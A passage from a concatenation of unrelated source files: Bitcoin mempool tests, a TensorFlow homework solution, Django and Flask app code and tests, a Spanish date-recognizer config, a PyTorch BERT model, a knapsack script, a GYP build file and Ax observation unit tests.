spend_101_raw = create_raw_transaction(self.nodes[0], coinbase_txids[1], node1_address, amount=49.99)
spend_102_raw = create_raw_transaction(self.nodes[0], coinbase_txids[2], node0_address, amount=49.99)
spend_103_raw = create_raw_transaction(self.nodes[0], coinbase_txids[3], node0_address, amount=49.99)
# Create a transaction which is time-locked to two blocks in the future
timelock_tx = self.nodes[0].createrawtransaction([{"txid": coinbase_txids[0], "vout": 0}], {node0_address: 49.99})
# Set the time lock
timelock_tx = timelock_tx.replace("ffffffff", "11111191", 1)
timelock_tx = timelock_tx[:-8] + hex(self.nodes[0].getblockcount() + 2)[2:] + "000000"
timelock_tx = self.nodes[0].signrawtransactionwithwallet(timelock_tx)["hex"]
# This will raise an exception because the timelock transaction is too immature to spend
assert_raises_rpc_error(-26, "non-final", self.nodes[0].sendrawtransaction, timelock_tx)
# Broadcast and mine spend_102 and 103:
spend_102_id = self.nodes[0].sendrawtransaction(spend_102_raw)
spend_103_id = self.nodes[0].sendrawtransaction(spend_103_raw)
self.nodes[0].generate(1)
# Time-locked transaction is still too immature to spend
assert_raises_rpc_error(-26, 'non-final', self.nodes[0].sendrawtransaction, timelock_tx)
# Create 102_1 and 103_1:
spend_102_1_raw = create_raw_transaction(self.nodes[0], spend_102_id, node1_address, amount=49.98)
spend_103_1_raw = create_raw_transaction(self.nodes[0], spend_103_id, node1_address, amount=49.98)
# Broadcast and mine 103_1:
spend_103_1_id = self.nodes[0].sendrawtransaction(spend_103_1_raw)
last_block = self.nodes[0].generate(1)
# Time-locked transaction can now be spent
timelock_tx_id = self.nodes[0].sendrawtransaction(timelock_tx)
# ... now put spend_101 and spend_102_1 in memory pools:
spend_101_id = self.nodes[0].sendrawtransaction(spend_101_raw)
spend_102_1_id = self.nodes[0].sendrawtransaction(spend_102_1_raw)
self.sync_all()
assert_equal(set(self.nodes[0].getrawmempool()), {spend_101_id, spend_102_1_id, timelock_tx_id})
for node in self.nodes:
node.invalidateblock(last_block[0])
# Time-locked transaction is now too immature and has been removed from the mempool
# spend_103_1 has been re-orged out of the chain and is back in the mempool
assert_equal(set(self.nodes[0].getrawmempool()), {spend_101_id, spend_102_1_id, spend_103_1_id})
# Use invalidateblock to re-org back and make all those coinbase spends
# immature/invalid:
for node in self.nodes:
node.invalidateblock(new_blocks[0])
self.sync_all()
# mempool should be empty.
assert_equal(set(self.nodes[0].getrawmempool()), set())
if __name__ == '__main__':
MempoolCoinbaseTest().main()
|
import numpy as np
import tensorflow as tf
from utils.general_utils import test_all_close
def softmax(x):
"""
Compute the softmax function in tensorflow.
You might find the tensorflow functions tf.exp, tf.reduce_max,
tf.reduce_sum, tf.expand_dims useful. (Many solutions are possible, so you may
not need to use all of these functions). Recall also that many common
tensorflow operations are sugared (e.g. x * y does a tensor multiplication
if x and y are both tensors). Make sure to implement the numerical stability
fixes as in the previous homework!
Args:
x: tf.Tensor with shape (n_samples, n_features). Note feature vectors are
represented by row-vectors. (For simplicity, no need to handle 1-d
input as in the previous homework)
Returns:
out: tf.Tensor with shape (n_sample, n_features). You need to construct this
tensor in this problem.
"""
### YOUR CODE HERE
x_max=tf.reduce_max(x,1,keep_dims=True) # find row-wise maximums
x=tf.subtract(x,x_max) # subtract x_max
x_exp=tf.exp(x) # exponentiation
sum_exp=tf.reduce_sum(x_exp,1,keep_dims=True) # sum
out=tf.div(x_exp,sum_exp)
### END YOUR CODE
return out
def cross_entropy_loss(y, yhat):
"""
Compute the cross entropy loss in tensorflow.
The loss should be summed over the current minibatch.
y is a one-hot tensor of shape (n_samples, n_classes) and yhat is a tensor
of shape (n_samples, n_classes). y should be of dtype tf.int32, and yhat should
be of dtype tf.float32.
The functions tf.to_float, tf.reduce_sum, and tf.log might prove useful. (Many
solutions are possible, so you may not need to use all of these functions).
Note: You are NOT allowed to use the tensorflow built-in cross-entropy
functions.
Args:
y: tf.Tensor with shape (n_samples, n_classes). One-hot encoded.
yhat: tf.Tensorwith shape (n_sample, n_classes). Each row encodes a
probability distribution and should sum to 1.
Returns:
out: tf.Tensor with shape (1,) (Scalar output). You need to construct this
tensor in the problem.
"""
### YOUR CODE HERE
product=tf.multiply(tf.to_float(y),tf.log(yhat))
out=tf.negative(tf.reduce_sum(product))
### END YOUR CODE
return out
def test_softmax_basic():
"""
Some simple tests of softmax to get you started.
Warning: these are not exhaustive.
"""
test1 = softmax(tf.constant(np.array([[1001, 1002], [3, 4]]), dtype=tf.float32))
with tf.Session() as sess:
test1 = sess.run(test1)
test_all_close("Softmax test 1", test1, np.array([[0.26894142, 0.73105858],
[0.26894142, 0.73105858]]))
test2 = softmax(tf.constant(np.array([[-1001, -1002]]), dtype=tf.float32))
with tf.Session() as sess:
test2 = sess.run(test2)
test_all_close("Softmax test 2", test2, np.array([[0.73105858, 0.26894142]]))
print("Basic (non-exhaustive) softmax tests pass\n")
def test_cross_entropy_loss_basic():
"""
Some simple tests of cross_entropy_loss to get you started.
Warning: these are not exhaustive.
"""
y = np.array([[0, 1], [1, 0], [1, 0]])
yhat = np.array([[.5, .5], [.5, .5], [.5, .5]])
test1 = cross_entropy_loss(
tf.constant(y, dtype=tf.int32),
tf.constant(yhat, dtype=tf.float32))
with tf.Session() as sess:
test1 = sess.run(test1)
expected = -3 * np.log(.5)
test_all_close("Cross-entropy test 1", test1, expected)
print("Basic (non-exhaustive) cross-entropy tests pass")
if __name__ == "__main__":
test_softmax_basic()
test_cross_entropy_loss_basic()
|
# Copyright 2021 Ismael Lugo <ismael.lugo@deloe.net>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
from flask import Blueprint
from flask import g
from flask_wtf.csrf import CSRFError
bp_api = Blueprint('api_v1', __name__, url_prefix='/api/v1')
@bp_api.after_request
def auto_api_json(response):
if not g.get('no_json', False):
try:
data = json.loads(response.get_data())
except json.decoder.JSONDecodeError:
pass
else:
data['success'] = 'errors' not in data
response.data = json.dumps(data)
return response
@bp_api.errorhandler(CSRFError)
def handle_csrf_error(e) -> dict:
return dict(errors={'csrf': e.description})
__all__ = ['bp_api']
|
from django.contrib.auth import get_user_model
from django.urls import reverse
from django.test import TestCase
from rest_framework import status
from rest_framework.test import APIClient
from core.models import Tag, Recipe
from recipe.serializers import TagSerializer
TAGS_URL = reverse('recipe:tag-list')
class PublicTagsApiTests(TestCase):
"""Test that publicly available tags API"""
def setUp(self) -> None:
self.client = APIClient()
def test_login_required(self):
"""Test that login is required to retrieve tags"""
response = self.client.get(TAGS_URL)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
class PrivateTagsApiTests(TestCase):
"""Test the authorized user tags API"""
def setUp(self) -> None:
self.user = get_user_model().objects.create(
'test@londonappdev.com',
'password123'
)
self.client = APIClient()
self.client.force_authenticate(self.user)
def test_retrieve_tags(self):
"""Test retrieving tags"""
Tag.objects.create(user=self.user, name='Vegan')
Tag.objects.create(user=self.user, name='Dessert')
response = self.client.get(TAGS_URL)
tags = Tag.objects.all().order_by('-name')
serializer = TagSerializer(tags, many=True)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.data, serializer.data)
def test_tags_limited_to_user(self):
"""Test that tags returned are for the authenticated user"""
user2 = get_user_model().objects.create_user(
'other@londonappdev.com',
'testpass123'
)
Tag.objects.create(user=user2, name='Fruity')
tag = Tag.objects.create(user=self.user, name='Comfort Food')
response = self.client.get(TAGS_URL)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.data),1)
self.assertEqual(response.data[0]['name'],tag.name)
def test_create_tag_successful(self):
"""Test creating a new tag"""
payload = {'name': 'Test tag'}
self.client.post(TAGS_URL, payload)
exists = Tag.objects.filter(
user=self.user,
name = payload['name']
).exists()
self.assertTrue(exists)
def test_create_tag_invalid(self):
"""Test to create a tag with invalid payload"""
payload = {'name': ''}
response = self.client.post(TAGS_URL, payload)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_retrieve_tags_assigned_to_recipes(self):
"""Test filtering tags by those assigned in the recipes"""
tag1 = Tag.objects.create(user=self.user, name='Breakfast')
tag2 = Tag.objects.create(user=self.user, name='Lunch')
recipe = Recipe.objects.create(
title='Coriander eggs on toasts',
time_minutes=10,
price=5.0,
user=self.user
)
recipe.tags.add(tag1)
response = self.client.get(TAGS_URL, {'assigned_only': 1})
serializer1 = TagSerializer(tag1)
serializer2 = TagSerializer(tag2)
self.assertIn(serializer1, response.data)
self.assertNotIn(serializer2, response.data)
def test_retrieve_tags_assigned_unique(self):
"""Test filtering tags by assigned returns unique items"""
tag = Tag.objects.create(user=self.user, name='Breakfast')
Tag.objects.create(user=self.user, name='Lunch')
recipe1 = Recipe.objects.create(
title='Pancakes',
time_minutes=5,
price=3.00,
user=self.user
)
recipe1.tags.add(tag)
recipe2 = Recipe.objects.create(
title='Porridge',
time_minutes=3,
price=2.00,
user=self.user
)
recipe2.tags.add(tag)
response = self.client.get(TAGS_URL, {'assigned_only': 1})
self.assertEqual(len(response.data),1)
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
from typing import Pattern, List, Dict
from recognizers_number import (BaseNumberExtractor, BaseNumberParser,
SpanishOrdinalExtractor, SpanishIntegerExtractor, SpanishNumberParserConfiguration)
from recognizers_text.utilities import RegExpUtility
from ...resources.spanish_date_time import SpanishDateTime
from ..extractors import DateTimeExtractor
from ..base_duration import BaseDurationExtractor
from ..base_date import DateExtractorConfiguration
from ..utilities import DateTimeUtilityConfiguration
from .duration_extractor_config import SpanishDurationExtractorConfiguration
from .base_configs import SpanishDateTimeUtilityConfiguration
from ..constants import Constants
from ...resources.base_date_time import BaseDateTime
class SpanishDateExtractorConfiguration(DateExtractorConfiguration):
@property
def week_day_start(self) -> Pattern:
return self._week_day_start
@property
def check_both_before_after(self) -> bool:
return self._check_both_before_after
@property
def date_regex_list(self) -> List[Pattern]:
return self._date_regex_list
@property
def implicit_date_list(self) -> List[Pattern]:
return self._implicit_date_list
@property
def month_end(self) -> Pattern:
return self._month_end
@property
def week_day_end(self) -> Pattern:
return self._week_day_end
@property
def of_month(self) -> Pattern:
return self._of_month
@property
def date_unit_regex(self) -> Pattern:
return self._date_unit_regex
@property
def for_the_regex(self) -> Pattern:
return self._for_the_regex
@property
def week_day_and_day_of_month_regex(self) -> Pattern:
return self._week_day_and_day_of_month_regex
@property
def relative_month_regex(self) -> Pattern:
return self._relative_month_regex
@property
def week_day_regex(self) -> Pattern:
return self._week_day_regex
@property
def prefix_article_regex(self) -> Pattern:
return self._prefix_article_regex
@property
def day_of_week(self) -> Dict[str, int]:
return self._day_of_week
@property
def month_of_year(self) -> Dict[str, int]:
return self._month_of_year
@property
def ordinal_extractor(self) -> BaseNumberExtractor:
return self._ordinal_extractor
@property
def integer_extractor(self) -> BaseNumberExtractor:
return self._integer_extractor
@property
def number_parser(self) -> BaseNumberParser:
return self._number_parser
@property
def duration_extractor(self) -> DateTimeExtractor:
return self._duration_extractor
@property
def strict_relative_regex(self) -> Pattern:
return self._strict_relative_regex
@property
def range_connector_symbol_regex(self) -> Pattern:
return self._range_connector_symbol_regex
@property
def utility_configuration(self) -> DateTimeUtilityConfiguration:
return self._utility_configuration
@property
def year_suffix(self) -> Pattern:
return self._year_suffix
@property
def more_than_regex(self) -> Pattern:
return self._more_than_regex
@property
def less_than_regex(self) -> Pattern:
return self._less_than_regex
@property
def in_connector_regex(self) -> Pattern:
return self._in_connector_regex
@property
def range_unit_regex(self) -> Pattern:
return self._range_unit_regex
@property
def since_year_suffix_regex(self) -> Pattern:
return self._since_year_suffix_regex
@property
def week_day_and_day_regex(self) -> Pattern:
return self._week_day_and_day_regex
def __init__(self):
self._check_both_before_after = False
if SpanishDateTime.DefaultLanguageFallback == Constants.DEFAULT_LANGUAGE_FALLBACK_DMY:
date_extractor_4 = SpanishDateTime.DateExtractor5
date_extractor_5 = SpanishDateTime.DateExtractor4
date_extractor_6 = SpanishDateTime.DateExtractor8
date_extractor_8 = SpanishDateTime.DateExtractor6
date_extractor_7 = SpanishDateTime.DateExtractor9
date_extractor_9 = SpanishDateTime.DateExtractor7
else:
date_extractor_4 = SpanishDateTime.DateExtractor4
date_extractor_5 = SpanishDateTime.DateExtractor5
date_extractor_6 = SpanishDateTime.DateExtractor6
date_extractor_8 = SpanishDateTime.DateExtractor8
date_extractor_7 = SpanishDateTime.DateExtractor7
date_extractor_9 = SpanishDateTime.DateExtractor9
self._date_regex_list = [
RegExpUtility.get_safe_reg_exp(SpanishDateTime.DateExtractor1),
RegExpUtility.get_safe_reg_exp(SpanishDateTime.DateExtractor2),
RegExpUtility.get_safe_reg_exp(SpanishDateTime.DateExtractor3),
RegExpUtility.get_safe_reg_exp(date_extractor_4),
RegExpUtility.get_safe_reg_exp(date_extractor_5),
RegExpUtility.get_safe_reg_exp(date_extractor_6),
RegExpUtility.get_safe_reg_exp(date_extractor_7),
RegExpUtility.get_safe_reg_exp(date_extractor_8),
RegExpUtility.get_safe_reg_exp(date_extractor_9),
RegExpUtility.get_safe_reg_exp(SpanishDateTime.DateExtractor10),
]
self._implicit_date_list = [
RegExpUtility.get_safe_reg_exp(SpanishDateTime.OnRegex),
RegExpUtility.get_safe_reg_exp(SpanishDateTime.RelaxedOnRegex),
RegExpUtility.get_safe_reg_exp(SpanishDateTime.SpecialDayRegex),
RegExpUtility.get_safe_reg_exp(SpanishDateTime.ThisRegex),
RegExpUtility.get_safe_reg_exp(SpanishDateTime.LastDateRegex),
RegExpUtility.get_safe_reg_exp(SpanishDateTime.NextDateRegex),
RegExpUtility.get_safe_reg_exp(SpanishDateTime.WeekDayRegex),
RegExpUtility.get_safe_reg_exp(
SpanishDateTime.WeekDayOfMonthRegex),
RegExpUtility.get_safe_reg_exp(SpanishDateTime.SpecialDateRegex),
]
self._month_end = RegExpUtility.get_safe_reg_exp(
SpanishDateTime.MonthEndRegex)
self._of_month = RegExpUtility.get_safe_reg_exp(
SpanishDateTime.OfMonthRegex)
self._date_unit_regex = RegExpUtility.get_safe_reg_exp(
SpanishDateTime.DateUnitRegex)
self._for_the_regex = RegExpUtility.get_safe_reg_exp(
SpanishDateTime.ForTheRegex)
self._week_day_and_day_of_month_regex = RegExpUtility.get_safe_reg_exp(
SpanishDateTime.WeekDayAndDayOfMonthRegex)
self._relative_month_regex = RegExpUtility.get_safe_reg_exp(
SpanishDateTime.RelativeMonthRegex)
self._week_day_regex = RegExpUtility.get_safe_reg_exp(
SpanishDateTime.WeekDayRegex)
self._day_of_week = SpanishDateTime.DayOfWeek
self._ordinal_extractor = SpanishOrdinalExtractor()
self._integer_extractor = SpanishIntegerExtractor()
self._number_parser = BaseNumberParser(
SpanishNumberParserConfiguration())
self._duration_extractor = BaseDurationExtractor(
SpanishDurationExtractorConfiguration())
self._utility_configuration = SpanishDateTimeUtilityConfiguration()
self._range_connector_symbol_regex = RegExpUtility.get_safe_reg_exp(
BaseDateTime.RangeConnectorSymbolRegex
)
self._strict_relative_regex = RegExpUtility.get_safe_reg_exp(
SpanishDateTime.StrictRelativeRegex
)
self._year_suffix = RegExpUtility.get_safe_reg_exp(
SpanishDateTime.YearSuffix
)
self._month_of_year = SpanishDateTime.MonthOfYear
self._prefix_article_regex = RegExpUtility.get_safe_reg_exp(
SpanishDateTime.PrefixArticleRegex
)
self._week_day_end = RegExpUtility.get_safe_reg_exp(
SpanishDateTime.WeekDayEnd
)
self._more_than_regex = RegExpUtility.get_safe_reg_exp(
SpanishDateTime.MoreThanRegex
)
self._less_than_regex = RegExpUtility.get_safe_reg_exp(
SpanishDateTime.LessThanRegex
)
self._in_connector_regex = RegExpUtility.get_safe_reg_exp(
SpanishDateTime.InConnectorRegex
)
self._range_unit_regex = RegExpUtility.get_safe_reg_exp(
SpanishDateTime.RangeUnitRegex
)
self._since_year_suffix_regex = RegExpUtility.get_safe_reg_exp(
SpanishDateTime.SinceYearSuffixRegex
)
self._week_day_and_day_regex = RegExpUtility.get_safe_reg_exp(
SpanishDateTime.WeekDayAndDayRegex
)
self._week_day_start = RegExpUtility.get_safe_reg_exp(
SpanishDateTime.WeekDayStart
)
self._check_both_before_after = SpanishDateTime.CheckBothBeforeAfter
|
from django.shortcuts import render
from .models import TimeSheet
def index(request):
TimeCards = TimeSheet.objects.all
context = {'TimeCards': TimeCards}
return render(request, 'timecard_app/index.html', context)
# Leave the rest of the views (detail, results, vote) unchanged
|
import torch
import torch.nn as nn
import numpy as np
import json
class BertConfig(object):
def __init__(self,
vocab_size,
hidden_size=768,
num_hidden_layers=12,
num_attention_heads=12,
intermediate_size=3072,
hidden_act='gelu',
hidden_dropout_prob=0.9,
attention_dropout_prob=0.9,
max_seq_length=512,
type_vocab_size=16,
initialize_range=0.02):
self.vocab_size = vocab_size
self.hidden_size = hidden_size
self.num_hidden_layers = num_hidden_layers
self.num_attention_heads = num_attention_heads
self.intermediate_size = intermediate_size
self.hidden_act = hidden_act
self.hidden_dropout_prob = hidden_dropout_prob
self.attention_dropout_prob = attention_dropout_prob
self.max_seq_length = max_seq_length
self.type_vocab_size = type_vocab_size
self.initialize_range = initialize_range
@classmethod
def from_json(cls, json_file):
with open(json_file, "r") as f:
config_dict = json.load(f)
config = BertConfig(vocab_size=None)
for key, value in config_dict.items():
config.__dict__[key] = value
return config
class Bert(nn.Module):
def __init__(self, config):
super(Bert, self).__init__()
self.config = config
self.tok_embedding = nn.Embedding(config.vocab_size, config.hidden_size)
self.pos_embedding = nn.Embedding(config.max_seq_length, config.hidden_size)
self.seg_embedding = nn.Embedding(config.type_vocab_size, config.hidden_size)
self.encoders = nn.ModuleList([
Encoder(
config.hidden_size,
config.num_attention_heads,
config.intermediate_size,
config.hidden_act,
config.hidden_dropout_prob,
config.attention_dropout_prob) for _ in range(config.num_hidden_layers)
])
self.dropout = nn.Dropout(config.hidden_dropout_prob)
def forward(self, x, mask, segment_ids):
batch_size, max_seq_length = x.shape
mask = mask.unsqueeze(1).repeat(1, max_seq_length, 1).unsqueeze(1)
te = self.tok_embedding(x)
pos = torch.arange(0, max_seq_length).unsqueeze(0).repeat(batch_size, 1)
pe = self.pos_embedding(pos)
se = self.seg_embedding(segment_ids)
x = te + pe + se
x = self.dropout(x)
for encoder in self.encoders:
x = encoder(x, mask)
return x
class Encoder(nn.Module):
def __init__(self,
hidden_size,
num_attention_heads,
intermediate_size,
hidden_act,
hidden_dropout_prob,
attention_dropout_prob):
super(Encoder, self).__init__()
self.self_attention = MultiHeadAttention(hidden_size, num_attention_heads, attention_dropout_prob)
self.activation = nn.GELU() if hidden_act == 'gelu' else nn.Tanh()
self.ffn = nn.Sequential(nn.Linear(hidden_size, intermediate_size),
self.activation,
nn.Linear(intermediate_size,hidden_size))
self.layer_norm = nn.LayerNorm(hidden_size)
self.dropout = nn.Dropout(hidden_dropout_prob)
def forward(self, x, mask):
attention_output = self.self_attention(x, x, x, mask)
attention_output = self.layer_norm(x + self.dropout(attention_output))
encoder_output = self.ffn(attention_output)
encoder_output = self.layer_norm(attention_output + self.dropout(encoder_output))
return encoder_output
class MultiHeadAttention(nn.Module):
"""Multi-Head Attention Layer"""
def __init__(self, hidden_size, num_attention_heads, attention_dropout_prob):
super(MultiHeadAttention, self).__init__()
self.h = num_attention_heads
self.d_k = hidden_size // num_attention_heads
self.w_q = nn.Linear(hidden_size, hidden_size)
self.w_k = nn.Linear(hidden_size, hidden_size)
self.w_v = nn.Linear(hidden_size, hidden_size)
self.w_o = nn.Linear(hidden_size, hidden_size)
self.dropout = nn.Dropout(attention_dropout_prob)
def forward(self, query, key, value, mask=None):
# q, k, v = [batch_size, src_len, hidden_size]
batch_size, hidden_size = query.shape[0], query.shape[2]
# q, k, v = [batch_size, src_len, hidden_size]
q = self.w_q(query)
k = self.w_k(key)
v = self.w_v(value)
# q, v = [batch_size, src_len, num_attention_heads, head_size]
# k = [batch_size, src_len, head_size, num_attention_heads]
q = q.view(batch_size, -1, self.h, self.d_k).permute(0, 2, 1, 3)
k = k.view(batch_size, -1, self.h, self.d_k).permute(0, 2, 3, 1)
v = v.view(batch_size, -1, self.h, self.d_k).permute(0, 2, 1, 3)
# Attention(Q, K, V) = Softmax(Q * K^T / d) * V
attention_scores = torch.matmul(q, k) / np.sqrt(self.d_k)
if mask is not None:
attention_scores = attention_scores.masked_fill(mask == 0, -1e4)
attention_probs = torch.softmax(attention_scores, dim=-1)
attention_probs = self.dropout(attention_probs)
y = torch.matmul(attention_probs, v)
# y = [batch_size, src_len, hidden_size]
y = y.permute(0, 2, 1, 3).contiguous().view(batch_size, -1, hidden_size)
return self.w_o(y)
|
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "Mtaa.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
|
# Uses python3
import sys
def get_optimal_value(capacity, weights, values):
value = 0.
# get value per unit
v_u = [(v, w, v/w) for w, v in zip(weights, values)]
v_u = sorted(v_u, key=lambda x: x[2], reverse = True)
for idx in range(len(v_u)):
if capacity == 0:
return value
a = min(v_u[idx][1], capacity)
value = value + a*v_u[idx][2]
capacity -= a
return value
if __name__ == "__main__":
data = list(map(int, sys.stdin.read().split()))
n, capacity = data[0:2]
values = data[2:(2 * n + 2):2]
weights = data[3:(2 * n + 2):2]
opt_value = get_optimal_value(capacity, weights, values)
print("{:.10f}".format(opt_value))
|
# Generated by Django 3.1.13 on 2022-02-01 18:52
from django.db import migrations, models
import skills_matcher_db.users.models
class Migration(migrations.Migration):
dependencies = [
('users', '0012_auto_20220128_1918'),
]
operations = [
migrations.AlterField(
model_name='user',
name='user_type',
field=skills_matcher_db.users.models.ChoiceArrayField(base_field=models.CharField(blank=True, choices=[('EXPERT', 'Expert'), ('ENGINEER', 'Engineer'), ('PROJECT_OWNER', 'Project Owner')], max_length=50), blank=True, null=True, size=None),
),
]
|
# GYP file to build a V8 sample.
{
'targets': [
{
'target_name': 'SkV8Example',
'type': 'executable',
'mac_bundle' : 1,
'include_dirs' : [
'../third_party/externals/v8/include',
],
'sources': [
'../experimental/SkV8Example/BaseContext.cpp',
'../experimental/SkV8Example/BaseContext.h',
'../experimental/SkV8Example/Global.cpp',
'../experimental/SkV8Example/Global.h',
'../experimental/SkV8Example/JsContext.cpp',
'../experimental/SkV8Example/JsContext.h',
'../experimental/SkV8Example/Path2D.cpp',
'../experimental/SkV8Example/Path2D.h',
'../experimental/SkV8Example/SkV8Example.cpp',
'../experimental/SkV8Example/SkV8Example.h',
],
'dependencies': [
'flags.gyp:flags',
'skia_lib.gyp:skia_lib',
'views.gyp:views',
'xml.gyp:xml',
],
'link_settings': {
'libraries': [
# 'd:/src/v8/build/Debug/lib/v8_base.ia32.lib',
# 'd:/src/v8/build/Debug/lib/v8_snapshot.lib',
# 'd:/src/v8/build/Debug/lib/icuuc.lib',
# 'd:/src/v8/build/Debug/lib/icui18n.lib',
# 'Ws2_32.lib',
# 'Winmm.lib',
'-lpthread',
'-lrt',
'../../third_party/externals/v8/out/native/obj.target/tools/gyp/libv8_base.x64.a',
'../../third_party/externals/v8/out/native/obj.target/tools/gyp/libv8_snapshot.a',
'../../third_party/externals/v8/out/native/obj.target/third_party/icu/libicudata.a',
'../../third_party/externals/v8/out/native/obj.target/third_party/icu/libicui18n.a',
'../../third_party/externals/v8/out/native/obj.target/third_party/icu/libicuuc.a',
'../../third_party/externals/v8/out/native/obj.target/icudata/third_party/icu/linux/icudt46l_dat.o',
],
},
'conditions' : [
[ 'skia_gpu == 1', {
'include_dirs' : [
'../src/gpu',
]
}],
[ 'skia_os == "win"', {
'sources' : [
'../src/views/win/SkOSWindow_Win.cpp',
'../src/views/win/skia_win.cpp',
],
}],
[ 'skia_os == "mac"', {
'sources': [
'../src/views/mac/SampleAppDelegate.h',
'../src/views/mac/SampleAppDelegate.mm',
'../src/views/mac/SkEventNotifier.mm',
'../src/views/mac/skia_mac.mm',
'../src/views/mac/SkNSView.h',
'../src/views/mac/SkNSView.mm',
'../src/views/mac/SkOptionsTableView.h',
'../src/views/mac/SkOptionsTableView.mm',
'../src/views/mac/SkOSWindow_Mac.mm',
'../src/views/mac/SkTextFieldCell.h',
'../src/views/mac/SkTextFieldCell.m',
],
'include_dirs' : [
'../src/views/mac/'
],
'xcode_settings' : {
'INFOPLIST_FILE' : '../experimental/SkiaExamples/SkiaExamples-Info.plist',
},
'mac_bundle_resources' : [
'../experimental/SkiaExamples/SkiaExamples.xib'
],
}],
],
}
],
}
|
#!/usr/bin/env python3
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import json
from unittest.mock import Mock, PropertyMock
import numpy as np
import pandas as pd
from ax.core.arm import Arm
from ax.core.base_trial import TrialStatus
from ax.core.batch_trial import BatchTrial
from ax.core.data import Data
from ax.core.generator_run import GeneratorRun
from ax.core.map_data import MapData, MapKeyInfo
from ax.core.observation import (
Observation,
ObservationData,
ObservationFeatures,
observations_from_data,
observations_from_map_data,
separate_observations,
)
from ax.core.trial import Trial
from ax.utils.common.testutils import TestCase
class ObservationsTest(TestCase):
def testObservationFeatures(self):
t = np.datetime64("now")
attrs = {
"parameters": {"x": 0, "y": "a"},
"trial_index": 2,
"start_time": t,
"end_time": t,
"random_split": 1,
}
obsf = ObservationFeatures(**attrs)
for k, v in attrs.items():
self.assertEqual(getattr(obsf, k), v)
printstr = "ObservationFeatures(parameters={'x': 0, 'y': 'a'}, "
printstr += "trial_index=2, "
printstr += "start_time={t}, end_time={t}, ".format(t=t)
printstr += "random_split=1)"
self.assertEqual(repr(obsf), printstr)
obsf2 = ObservationFeatures(**attrs)
self.assertEqual(hash(obsf), hash(obsf2))
a = {obsf, obsf2}
self.assertEqual(len(a), 1)
self.assertEqual(obsf, obsf2)
attrs.pop("trial_index")
obsf3 = ObservationFeatures(**attrs)
self.assertNotEqual(obsf, obsf3)
self.assertFalse(obsf == 1)
def testClone(self):
# Test simple cloning.
arm = Arm({"x": 0, "y": "a"})
obsf = ObservationFeatures.from_arm(arm, trial_index=3)
self.assertIsNot(obsf, obsf.clone())
self.assertEqual(obsf, obsf.clone())
# Test cloning with swapping parameters.
clone_with_new_params = obsf.clone(replace_parameters={"x": 1, "y": "b"})
self.assertNotEqual(obsf, clone_with_new_params)
obsf.parameters = {"x": 1, "y": "b"}
self.assertEqual(obsf, clone_with_new_params)
def testObservationFeaturesFromArm(self):
arm = Arm({"x": 0, "y": "a"})
obsf = ObservationFeatures.from_arm(arm, trial_index=3)
self.assertEqual(obsf.parameters, arm.parameters)
self.assertEqual(obsf.trial_index, 3)
def testUpdateFeatures(self):
parameters = {"x": 0, "y": "a"}
new_parameters = {"z": "foo"}
obsf = ObservationFeatures(parameters=parameters, trial_index=3)
# Ensure None trial_index doesn't override existing value
obsf.update_features(ObservationFeatures(parameters={}))
self.assertEqual(obsf.trial_index, 3)
# Test override
new_obsf = ObservationFeatures(
parameters=new_parameters,
trial_index=4,
start_time=pd.Timestamp("2005-02-25"),
end_time=pd.Timestamp("2005-02-26"),
random_split=7,
)
obsf.update_features(new_obsf)
self.assertEqual(obsf.parameters, {**parameters, **new_parameters})
self.assertEqual(obsf.trial_index, 4)
self.assertEqual(obsf.random_split, 7)
self.assertEqual(obsf.start_time, pd.Timestamp("2005-02-25"))
self.assertEqual(obsf.end_time, pd.Timestamp("2005-02-26"))
def testObservationData(self):
attrs = {
"metric_names": ["a", "b"],
"means": np.array([4.0, 5.0]),
"covariance": np.array([[1.0, 4.0], [3.0, 6.0]]),
}
obsd = ObservationData(**attrs)
self.assertEqual(obsd.metric_names, attrs["metric_names"])
self.assertTrue(np.array_equal(obsd.means, attrs["means"]))
self.assertTrue(np.array_equal(obsd.covariance, attrs["covariance"]))
# use legacy printing for numpy (<= 1.13 add spaces in front of floats;
# to get around tests failing on older versions, peg version to 1.13)
if np.__version__ >= "1.14":
np.set_printoptions(legacy="1.13")
printstr = "ObservationData(metric_names=['a', 'b'], means=[ 4. 5.], "
printstr += "covariance=[[ 1. 4.]\n [ 3. 6.]])"
self.assertEqual(repr(obsd), printstr)
self.assertEqual(obsd.means_dict, {"a": 4.0, "b": 5.0})
self.assertEqual(
obsd.covariance_matrix,
{"a": {"a": 1.0, "b": 4.0}, "b": {"a": 3.0, "b": 6.0}},
)
def testObservationDataValidation(self):
with self.assertRaises(ValueError):
ObservationData(
metric_names=["a", "b"],
means=np.array([4.0]),
covariance=np.array([[1.0, 4.0], [3.0, 6.0]]),
)
with self.assertRaises(ValueError):
ObservationData(
metric_names=["a", "b"],
means=np.array([4.0, 5.0]),
covariance=np.array([1.0, 4.0]),
)
def testObservationDataEq(self):
od1 = ObservationData(
metric_names=["a", "b"],
means=np.array([4.0, 5.0]),
covariance=np.array([[1.0, 4.0], [3.0, 6.0]]),
)
od2 = ObservationData(
metric_names=["a", "b"],
means=np.array([4.0, 5.0]),
covariance=np.array([[1.0, 4.0], [3.0, 6.0]]),
)
od3 = ObservationData(
metric_names=["a", "b"],
means=np.array([4.0, 5.0]),
covariance=np.array([[2.0, 4.0], [3.0, 6.0]]),
)
